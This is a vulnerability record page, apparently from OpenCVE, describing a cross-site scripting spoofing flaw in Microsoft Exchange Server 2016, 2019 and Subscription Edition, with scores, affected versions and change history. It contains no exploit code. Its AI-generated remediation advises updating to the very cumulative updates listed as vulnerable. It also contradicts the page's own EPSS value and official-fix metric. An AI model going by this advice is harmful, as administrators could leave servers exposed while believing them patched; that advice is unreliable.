Description
Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.
Published: 2026-06-09
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Improper neutralization of user‑supplied input during web page generation in Microsoft Exchange Server leads to a cross‑site scripting flaw (CWE‑79). The vulnerability permits an attacker to inject malicious scripts that can emulate legitimate traffic or user identities, enabling deceptive actions such as phishing. The description explicitly states that an unauthorized attacker can perform spoofing over a network. While the exact consequences beyond spoofing are not detailed, it is inferred that these scripts could facilitate phishing or other deceptive actions, thereby undermining trust.

Affected Systems

Microsoft Exchange Server 2016 is vulnerable in Cumulative Update 23, while Microsoft Exchange Server 2019 is affected in Cumulative Updates 14 and 15. The Subscription Edition at RTM release also remains impacted. All affected products are listed with their specific cumulative updates in the vendor data.

Risk and Exploitability

The CVSS score of 8.1 denotes high severity. No EPSS score is provided, and the vulnerability is not included in CISA’s KEV catalog, implying no publicly confirmed exploitation yet. The description indicates that an unauthorized attacker can exploit the flaw without authentication, suggesting that crafted requests can be sent over the network to trigger the XSS payload. Given the high severity, the lack of authentication requirement, and the potential to spoof traffic, the risk to network integrity and user trust remains significant.

Generated by OpenCVE AI on June 9, 2026 at 20:27 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the latest Microsoft Exchange Server cumulative update—CU23 for Exchange 2016, CU14 or CU15 for Exchange 2019, and the latest patch for the Subscription Edition.
  • For the interim, restrict Exchange web interface access to trusted IP ranges and disable legacy transport protocols if possible.
  • Deploy a web application firewall rule that blocks or sanitizes suspicious script content before it reaches Exchange web services.

Generated by OpenCVE AI on June 9, 2026 at 20:27 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 15 Jun 2026 19:30:00 +0000

Type Values Removed Values Added
First Time appeared Microsoft exchange Server Subscription Edition
CPEs cpe:2.3:a:microsoft:exchange_server:*:*:*:*:subscription:*:*:* cpe:2.3:a:microsoft:exchange_server_subscription_edition:*:*:*:*:*:*:*:*
Vendors & Products Microsoft exchange Server Subscription Edition

Mon, 15 Jun 2026 14:30:00 +0000

Type Values Removed Values Added
First Time appeared Microsoft exchange Server
CPEs cpe:2.3:a:microsoft:exchange_server:*:*:*:*:subscription:*:*:*
cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_23:*:*:*:*:*:*
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_14:*:*:*:*:*:*
cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_15:*:*:*:*:*:*
Vendors & Products Microsoft exchange Server

Wed, 10 Jun 2026 15:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 09 Jun 2026 23:15:00 +0000

Type Values Removed Values Added
First Time appeared Microsoft microsoft Exchange Server 2019 Cumulative Update 14
Microsoft microsoft Exchange Server 2019 Cumulative Update 15
Microsoft microsoft Exchange Server Subscription Edition Rtm
Vendors & Products Microsoft microsoft Exchange Server 2019 Cumulative Update 14
Microsoft microsoft Exchange Server 2019 Cumulative Update 15
Microsoft microsoft Exchange Server Subscription Edition Rtm

Tue, 09 Jun 2026 17:15:00 +0000

Type Values Removed Values Added
Description Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.
Title Microsoft Exchange Server Spoofing Vulnerability
First Time appeared Microsoft
Microsoft exchange Server 2016
Microsoft exchange Server 2019
Microsoft exchange Server Se
Weaknesses CWE-79
CPEs cpe:2.3:a:microsoft:exchange_server_2016:*:cumulative_update_23:*:*:*:*:*:*
cpe:2.3:a:microsoft:exchange_server_2019:*:cumulative_update_14:*:*:*:*:*:*
cpe:2.3:a:microsoft:exchange_server_2019:*:cumulative_update_15:*:*:*:*:*:*
cpe:2.3:a:microsoft:exchange_server_se:*:RTM:*:*:*:*:*:*
Vendors & Products Microsoft
Microsoft exchange Server 2016
Microsoft exchange Server 2019
Microsoft exchange Server Se
References
Metrics cvssV3_1

{'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:U/RL:O/RC:C'}

Subscriptions

Microsoft Exchange Server Exchange Server 2016 Exchange Server 2019 Exchange Server Se Exchange Server Subscription Edition Microsoft Exchange Server 2019 Cumulative Update 14 Microsoft Exchange Server 2019 Cumulative Update 15 Microsoft Exchange Server Subscription Edition Rtm
cve-icon MITRE

Status: PUBLISHED

Assigner: microsoft

Published:

Updated: 2026-06-26T19:41:09.658Z

Reserved: 2026-05-19T20:12:27.069Z

Link: CVE-2026-47631

cve-icon Vulnrichment

Updated: 2026-06-10T14:24:23.722Z

cve-icon NVD

Status : Analyzed

Published: 2026-06-09T17:17:35.173

Modified: 2026-06-15T19:20:08.503

Link: CVE-2026-47631

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-09T23:00:13Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')